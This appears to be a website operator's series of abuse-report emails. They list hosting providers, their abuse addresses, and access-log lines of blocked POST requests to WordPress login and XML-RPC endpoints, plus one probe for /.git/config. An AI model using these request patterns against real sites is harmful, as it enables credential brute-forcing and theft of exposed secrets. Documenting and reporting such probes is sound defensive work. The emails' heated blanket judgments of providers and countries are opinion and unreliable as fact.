MAIL NR. 19 TODAY – Hacking-attempts from weekend!

abuse@ovh.net,abuse@ovh.ca,abuse@ovh.us,abuse@ovhcloud.in,noc@ovh.net,esabuse@hkbnes.net,domain-abuse@dreamhost.com

AS16276 – OVH SAS – HERE WITH 6 IP´S! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net,abuse@ovhcloud.in
148.113.6.127 www.website*x.com – – [17/Aug/2025:07:47:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
148.113.6.127 www.website*x.com – – [17/Aug/2025:07:47:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
+
51.178.45.73 www.website*x.com – – [17/Aug/2025:08:17:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
51.178.45.73 www.website*x.com – – [17/Aug/2025:08:17:07 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
+
141.94.156.94 www.website*x.com – – [17/Aug/2025:08:22:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
141.94.156.94 www.website*x.com – – [17/Aug/2025:08:22:02 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
+
91.134.7.130 www.website*x.com – – [17/Aug/2025:09:00:35 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“
91.134.7.130 www.website*x.com – – [17/Aug/2025:09:00:35 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
+
188.165.54.175 www.website*x.com – – [17/Aug/2025:10:42:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
188.165.54.175 www.website*x.com – – [17/Aug/2025:10:42:36 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
+
15.235.163.15 www.website*x.com – – [17/Aug/2025:11:34:42 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
15.235.163.15 www.website*x.com – – [17/Aug/2025:11:34:43 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS10103 – HK Broadband Network Ltd. – CHINA IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
esabuse@hkbnes.net
123.1.133.4 www.website*x.com – – [17/Aug/2025:07:52:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0“
123.1.133.4 www.website*x.com – – [17/Aug/2025:07:52:35 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS26347 – New Dream Network, LLC – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
domain-abuse@dreamhost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
66.33.201.30 www.website*x.com – – [17/Aug/2025:08:12:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
66.33.201.30 www.website*x.com – – [17/Aug/2025:08:12:13 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
+
2607:f298:5:114b::ac3:6dfd www.website*x.com – – [17/Aug/2025:11:10:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
2607:f298:5:114b::ac3:6dfd www.website*x.com – – [17/Aug/2025:11:10:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

MAIL NR. 20 TODAY – Hacking-attempts from weekend!

bucklog@proton.me, contact@proton.me,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com

AS211590 – Bucklog SARL – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.177.72.24 website*x.de – – [17/Aug/2025:02:13:26 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36“

MAIL NR. 21 TODAY – Hacking-attempts from weekend!

hm-changed@vnnic.vn,linhlth@psgvietnam.com,hostmaster@centriohost.com,noc-admin@zelt.ae,IARPOC@Newfold.com,abuse@bluehost.com,legal@bluehost.com

AS151863 – PSG JOINT STOCK COMPANY – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hm-changed@vnnic.vn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.253.20.138 www.website*x.com – – [17/Aug/2025:08:26:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
103.253.20.138 www.website*x.com – – [17/Aug/2025:08:26:59 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

CENTRIOHOST-LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hostmaster@centriohost.com,noc-admin@zelt.ae
172.245.155.10 www.website*x.com – – [17/Aug/2025:08:31:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
172.245.155.10 www.website*x.com – – [17/Aug/2025:08:31:39 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“

Newfold Digital, Inc. + AS46606 – Unified Layer – HERE WITH 10 IP´S! – VERY IGNORANT!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VERY UNSECURE PROVIDER!!! – SUCH PROVIDERS SHOULD BE IMMEDIATELY BANNED AND BLOCKED!!!
IARPOC@Newfold.com,abuse@bluehost.com,legal@bluehost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
198.57.247.205 www.website*x.com – – [17/Aug/2025:08:46:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
198.57.247.205 www.website*x.com – – [17/Aug/2025:08:46:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
+
50.6.152.213 www.website*x.com – – [17/Aug/2025:10:18:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
50.6.152.213 www.website*x.com – – [17/Aug/2025:10:18:49 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
+
67.20.76.235 www.website*x.com – – [17/Aug/2025:10:33:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
67.20.76.235 www.website*x.com – – [17/Aug/2025:10:33:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
+
50.6.154.60 www.website*x.com – – [17/Aug/2025:10:47:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
50.6.154.60 www.website*x.com – – [17/Aug/2025:10:47:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
+
162.214.78.123 www.website*x.com – – [17/Aug/2025:11:25:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
162.214.78.123 www.website*x.com – – [17/Aug/2025:11:25:02 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
+
50.6.202.148 www.website*x.com – – [17/Aug/2025:11:39:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
50.6.202.148 www.website*x.com – – [17/Aug/2025:11:39:33 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
+
162.241.252.128 www.website*x.com – – [17/Aug/2025:11:49:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
162.241.252.128 www.website*x.com – – [17/Aug/2025:11:49:07 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
+
50.6.202.148 www.website*x.com – – [17/Aug/2025:12:26:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
50.6.202.148 www.website*x.com – – [17/Aug/2025:12:26:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
+
162.240.238.131 www.website*x.com – – [17/Aug/2025:12:49:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
162.240.238.131 www.website*x.com – – [17/Aug/2025:12:49:54 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
+
162.214.208.138 www.website*x.com – – [17/Aug/2025:12:58:48 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
162.214.208.138 www.website*x.com – – [17/Aug/2025:12:58:49 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
+
162.241.252.152 www.website*x.com – – [17/Aug/2025:13:07:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
162.241.252.152 www.website*x.com – – [17/Aug/2025:13:07:43 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

MAIL NR. 22 TODAY – Hacking-attempts from weekend!

abuse@arsys.es,abuse@ionos.com,hm-changed@vnnic.vn,hoang@interdata.vn,abuse@godaddy.com,noc@godaddy.com,abuse@hosteurope.de

AS8560 – IONOS SE – HERE WITH 3 IP´S! COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@arsys.es,abuse@ionos.com – – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
82.223.122.37 www.website*x.com – – [17/Aug/2025:08:50:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
82.223.122.37 www.website*x.com – – [17/Aug/2025:08:50:58 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
+
82.165.66.230 www.website*x.com – – [17/Aug/2025:10:51:52 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
82.165.66.230 www.website*x.com – – [17/Aug/2025:10:51:52 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“
+
82.223.70.74 www.website*x.com – – [17/Aug/2025:12:21:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
82.223.70.74 www.website*x.com – – [17/Aug/2025:12:21:56 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS151858 – INTERDIGI JOINT STOCK COMPANY – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hm-changed@vnnic.vn,hoang@interdata.vn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.173.227.90 www.website*x.com – – [17/Aug/2025:09:05:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
103.173.227.90 www.website*x.com – – [17/Aug/2025:09:05:30 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
103.173.227.90 www.website*x.com – – [17/Aug/2025:11:15:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
103.173.227.90 www.website*x.com – – [17/Aug/2025:11:15:09 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

AS398101 – GoDaddy.com, LLC + AS21499 – Host Europe GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@godaddy.com,noc@godaddy.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
132.148.176.148 www.website*x.com – – [17/Aug/2025:09:20:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
132.148.176.148 www.website*x.com – – [17/Aug/2025:09:20:21 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
+
92.205.250.54 www.website*x.com – – [17/Aug/2025:10:56:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“
92.205.250.54 www.website*x.com – – [17/Aug/2025:10:56:28 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 23 TODAY – Hacking-attempts from weekend!

abuse@amazonaws.com, trustandsafety@support.aws.com;abuse@m247.ro,abuse@alibaba-inc.com

AS16509 – Amazon.com, Inc. – ALWAYS STOPPED THIS HACKER-IDIOTS!
trustandsafety@support.aws.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD!
3.34.159.181 www.website*x.com – – [17/Aug/2025:09:25:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
3.34.159.181 www.website*x.com – – [17/Aug/2025:09:25:23 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

AS9009 – M247 Europe SRL
abuse@m247.ro – ALWAYS ANSWERED IN OUR ABUSE EMAILS!
2001:ac8:20:ff41:250:56ff:fe82:cb11 www.website*x.com – – [17/Aug/2025:09:30:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
2001:ac8:20:ff41:250:56ff:fe82:cb11 www.website*x.com – – [17/Aug/2025:09:30:19 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“

AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@alibaba-inc.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
8.133.253.244 www.website*x.com – – [17/Aug/2025:09:40:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
8.133.253.244 www.website*x.com – – [17/Aug/2025:09:40:10 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 24 TODAY – Hacking-attempts from weekend!

abuse@rusonyx.ru,abuse@le34.dk,abuse@GorillaServers.com,arin-admin@GorillaServers.com

AS41535 – LLC „ASTRA CLOUD“ – RUSSIA IS VERY UNWANTED! RUSSIA IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@rusonyx.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
89.253.255.122 www.website*x.com – – [17/Aug/2025:09:45:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS31027 – GlobalConnect A/S – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@le34.dk – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.199.236.107 www.website*x.com – – [17/Aug/2025:09:49:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
185.199.236.107 www.website*x.com – – [17/Aug/2025:09:49:55 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“

AS53850 – GorillaServers, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@GorillaServers.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
23.239.106.226 www.website*x.com – – [17/Aug/2025:09:59:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
23.239.106.226 www.website*x.com – – [17/Aug/2025:09:59:27 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

MAIL NR. 24 TODAY – Hacking-attempts from weekend!

abuse@hudsonvalleyhost.com,admin@HudsonValleyHost.com,abuse@hivelocity.net,abuse@ns1.bg

Hudson Valley Host – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hudsonvalleyhost.com
107.172.243.11 www.website*x.com – – [17/Aug/2025:10:09:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
107.172.243.11 www.website*x.com – – [17/Aug/2025:10:09:07 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“

AS29802 – HIVELOCITY, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hivelocity.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
107.155.67.51 www.website*x.com – – [17/Aug/2025:10:13:59 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“
107.155.67.51 www.website*x.com – – [17/Aug/2025:10:13:59 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

AS57344 – Telehouse EAD – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ns1.bg – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
217.174.152.96 www.website*x.com – – [17/Aug/2025:10:23:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
217.174.152.96 www.website*x.com – – [17/Aug/2025:10:23:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

MAIL NR. 25 TODAY – Hacking-attempts from weekend!

abuse@psychz.net,report@abuseradar.com,abuse@worldhost.group,abuse@hosteurope.de

AS40676 – Psychz Networks – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@psychz.net – HAS NOW ANSWERED AND BLOCK THE WEBSITE WITH THE SECURITY HOLE!
108.181.92.76 www.website*x.com – – [17/Aug/2025:10:28:31 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
108.181.92.76 www.website*x.com – – [17/Aug/2025:10:28:31 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

AS14670 – WHG Hosting Services Ltd – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
